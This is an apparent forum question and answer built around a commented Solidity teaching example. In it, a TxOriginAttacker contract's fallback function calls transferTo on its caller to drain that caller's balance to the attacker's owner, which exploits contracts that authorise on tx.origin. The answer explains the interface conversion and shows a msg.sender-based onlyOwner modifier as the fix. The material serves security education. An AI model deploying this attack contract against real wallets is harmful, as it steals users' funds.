pragma solidity ^0.5.8;
/// @title TxOriginVictim
/// @notice Minimal interface describing the one function this file calls on
///         another contract. It contains no implementation; it only gives the
///         compiler the signature needed to encode an external call.
interface TxOriginVictim {
    /// @param to     Address passed as the first argument of the call.
    /// @param amount Unsigned integer passed as the second argument.
    // NOTE(review): the implementing contract is not shown here, so how it
    // authorises the caller of transferTo cannot be confirmed from this file.
    function transferTo(address to, uint256 amount) external;
}
/// @title TxOriginAttacker
/// @notice Teaching example of why `tx.origin` must not be used as an
///         authorisation check. Any call into this contract's fallback makes
///         it call `transferTo` back on the caller.
contract TxOriginAttacker {
    // Deployer of this contract; written once in the constructor.
    address owner;

    /// @notice Records the deploying account as `owner`.
    constructor() public {
        owner = msg.sender;
    }

    /// @return The address stored in `owner`.
    function getOwner() public returns (address) {
        return owner;
    }

    /// @notice Fallback function: runs when this contract is called with no
    ///         matching function selector, e.g. on a plain ether transfer.
    function() external payable {
        // `TxOriginVictim(msg.sender)` is a type conversion, not a deployment:
        // it treats the address that called us as a contract exposing the
        // TxOriginVictim interface so that `transferTo` can be invoked on it.
        TxOriginVictim caller = TxOriginVictim(msg.sender);

        // Inside the callee, msg.sender is this contract while tx.origin is
        // still the account that started the transaction.
        // NOTE(review): presumably the callee authorises on tx.origin (its code
        // is not shown here); a check against msg.sender would reject this call.
        caller.transferTo(owner, msg.sender.balance);
    }
}
In the TxOriginAttacker contract, I can’t understand the purpose of TxOriginVictim’s interface. What is TxOriginVictim(msg.sender) in the statement:
TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);
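It's illustrating a vulnerability in using tx.origin for authorization. TxOriginVictim(msg.sender) does not create a new contract: it converts the caller's address to the interface type, so the compiler knows the contract at that address has a transferTo function and can encode the call to it. The interface exists only to supply that function signature.
Which is why in modern Solidity development we check the immediate caller (here via _msgSender()) rather than tx.origin: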
/// @dev Restricts the decorated function to the account stored in
///      `ownerOfToken`; any other caller causes a revert with the message below.
// NOTE(review): `_msgSender()` and `ownerOfToken` are defined outside this
// snippet. `_msgSender()` presumably returns msg.sender (as in OpenZeppelin's
// Context) — confirm. The point of the check is that it compares against the
// immediate caller, never against tx.origin.
modifier onlyOwner() {
    require(
        ownerOfToken == _msgSender(),
        "Ownable: caller is not the owner"
    );
    // Placeholder for the body of the function the modifier is applied to.
    // With several modifiers on one function, each `_;` is replaced by the
    // next modifier in the list, and the last one by the function body.
    _;
}